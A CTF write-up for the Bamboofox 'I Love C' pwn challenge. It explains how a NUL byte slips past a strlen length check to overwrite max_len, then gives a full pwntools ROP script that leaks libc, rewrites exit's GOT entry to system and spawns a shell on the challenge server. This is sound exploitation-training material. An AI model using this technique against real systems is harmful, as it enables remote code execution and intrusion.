# Bamboofox/train/I Love C [100]
###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup`
題目檔案連結:http://gofile.me/6lhQ2/YbYOJJaXi
名字的長度是0x14,因字串的檢查是使用strlen,因此使用\x00截斷可多塞一個\xff蓋到max_len
題目有開nx,做ROP,印出printf的got,再返回main
將printf改成system,然後進入有使用到printf的exit()
```
# -*- coding: UTF-8 -*-
# Solve script for the Bamboofox training challenge "I Love C" (see the
# writeup above).
#
# Root cause, per the writeup: the name buffer is 0x14 bytes but the length
# check uses strlen(), so a name containing an embedded NUL passes the check
# while one extra byte lands on the adjacent max_len field.  The defensive
# fix is to bound copies by the number of bytes actually received, never by
# strlen() of attacker-controlled data.
#
# Stage 1 (NX is enabled, so ROP): leak printf's GOT entry with puts() and
# return to main.  Stage 2: read() new contents into exit's GOT entry and
# call exit@plt, which then resolves through the overwritten entry.
# Both stages rely on a writable GOT (full RELRO would block stage 2) and on
# fixed gadget/symbol addresses (a PIE build would break them); the leak
# step presumably exists because libc's load address is randomized.  These
# are inferences from the hard-coded addresses below, not statements of the
# writeup.
#
# NOTE(review): the coding cookie and the unprefixed str payloads (e.g.
# "\xff") suggest this was written for Python 2; under Python 3 pwntools
# would re-encode those str values -- confirm the intended interpreter.
from pwn import *
context.arch = 'i386'
# Run-mode switches: local process vs. the challenge server, verbose
# pwntools logging, and whether to attach gdb to a local process.
local = False
debug = False
gdb1 = False
elf1 = ELF("./libc.so.6")   # challenge-provided libc, used only for symbol offsets
elf2 = ELF("./lovec")       # the vulnerable binary (symbols, PLT and GOT below come from it)
if debug == True:
    context.log_level = "debug"
if local == True:
    r = process("./lovec")
    if gdb1 == True:
        gdb.attach(r)
else:
    r = remote('bamboofox.cs.nctu.edu.tw', 11003)

def overflow():
    """Drive the program up to the overflowable free-text prompt.

    Sends a name of 0x13 filler bytes, a NUL (so strlen() stays below 0x14
    and the check passes) and one 0xff byte that, per the writeup, lands on
    max_len; then answers "1" so the program reaches the "why did you like
    it?" question, whose read presumably now honours the enlarged max_len.
    Called once per ROP stage, since stage 1 returns into main.
    """
    r.recvuntil("name:")
    r.send("a"*0x13+"\x00"+"\xff")
    r.recvuntil("10. C")
    r.sendline("1")
    r.recvuntil("Cool! And why did you like it?")

# Addresses taken from the binary (no PIE is assumed, see header comment).
main = elf2.symbols['main']
puts = elf2.symbols['puts']
read = elf2.symbols['read']
printf_got = elf2.got['printf']
# Gadgets: one pop discards a single call argument; three pops discard
# read()'s three arguments before returning to the next chain entry.
pop_ebx_ret = 0x080483b9
pop_esi_pop_edi_pop_ebp_ret = 0x080487fd
exit_plt = elf2.plt['exit']
exit_got = elf2.got['exit']
# Offsets inside the provided libc; combined with the leaked printf address
# they give the runtime address of system().
printf_offset = elf1.symbols['printf']
system_offset = elf1.symbols['system']

# Stage 1: 41 bytes of padding (presumably the distance to the saved return
# address), then puts(printf_got); the pop-ebx gadget drops the argument and
# returns into main so the program can be driven to the overflow again.
overflow()
r.send(b"a"*41+p32(puts)+p32(pop_ebx_ret)+p32(printf_got)+p32(main))
r.recvuntil("day!\n")
rec = r.recv(4)               # the 4 leaked bytes: printf's runtime address
printf_libc = u32(rec)

# Stage 2: read(0, exit_got, 0x100); the three-pop gadget clears the
# arguments; then exit@plt is called with exit_got+4 as its argument (the
# p32(0) after exit_plt is its return address).  The trailing newline
# presumably terminates the line the program is reading.
overflow()
r.send(b"a"*41+p32(read)+p32(pop_esi_pop_edi_pop_ebp_ret)+p32(0)+p32(exit_got)+p32(0x100)+p32(exit_plt)+p32(0)+p32(exit_got+4)+b"\n")
r.recvuntil("day!\n")
# Data consumed by the read() above: the first 4 bytes replace exit's GOT
# entry with system's address, the following "/bin/sh\0" sits at exit_got+4,
# so the exit@plt call resolves to system("/bin/sh").
r.sendline(p32(printf_libc-printf_offset+system_offset)+b"/bin/sh\x00")
#online
r.sendline("cat /home/ctf/flag")
r.interactive()
```